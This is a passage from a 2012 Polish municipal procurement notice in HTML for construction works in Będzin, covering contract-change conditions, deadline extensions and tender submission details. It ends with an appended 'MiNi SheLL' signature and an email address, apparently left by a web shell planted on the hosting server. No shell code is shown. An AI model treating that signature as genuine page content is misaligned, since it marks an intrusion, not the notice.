3.Zmiany mogą dotyczyć:
-aktualizacji rozwiązań projektowych z uwagi na postęp technologiczny,
-zmiany technologii wykonania robót,
-zmiany producenta urządzeń lub wyposażenia,
-zmiany wymiarów, położenia lub wysokości części robót budowlanych,
-zmiany w kolejności i terminach wykonywania robót budowlanych.
4. Zmiana terminu realizacji zamówienia może nastąpić w przypadku opóźnień wynikających z:
-przestojów i opóźnień zawinionych przez Zamawiającego,
-działania siły wyższej ( np. klęski żywiołowe, strajki generalne lub lokalne, zjawiska gospodarcze lub pogodowe) w pełni niezależnej od Stron umowy, mającej bezpośredni wpływ na termin wykonania robót,
-przeszkód technicznych w pełni niezależnych od Stron umowy, mających bezpośredni wpływ na termin wykonania robót,
-wystąpienia warunków atmosferycznych uniemożliwiających wykonywanie robót- fakt ten musi mieć odzwierciedlenie w dzienniku budowy i musi być potwierdzony przez inspektora nadzoru,
-wystąpienia okoliczności, których Strony umowy nie były w stanie przewidzieć, pomimo zachowania należytej staranności, 
-zlecenia zamówienia dodatkowego.
5.Zmiana osób uczestniczących w realizacji zamówienia może nastąpić w przypadku:
-utraty uprawnień,
-śmierci, długotrwałej  choroby lub nieobecności lub innych zdarzeń losowych,
-ustanie stosunku prawnego łączącego Wykonawcę z ww. osobami.
6.Zmiana wynagrodzenia może nastąpić wyłącznie w przypadku urzędowej zmiany wysokości podatku od towarów  i usług.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bedzin.bip.info.pl/index.php?idmp=30&r=r<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Będzinie
Biuro Zamówień Publicznych pok.117, 42-500 Będzin ul. 11 Listopada 20.
tel.fax 32 267 91 34.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.04.2012 godzina 09:00, miejsce: Urząd Miejski w Będzinie
Biuro Zamówień Publicznych pok.117, 42-500 Będzin ul. 11 Listopada 20..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com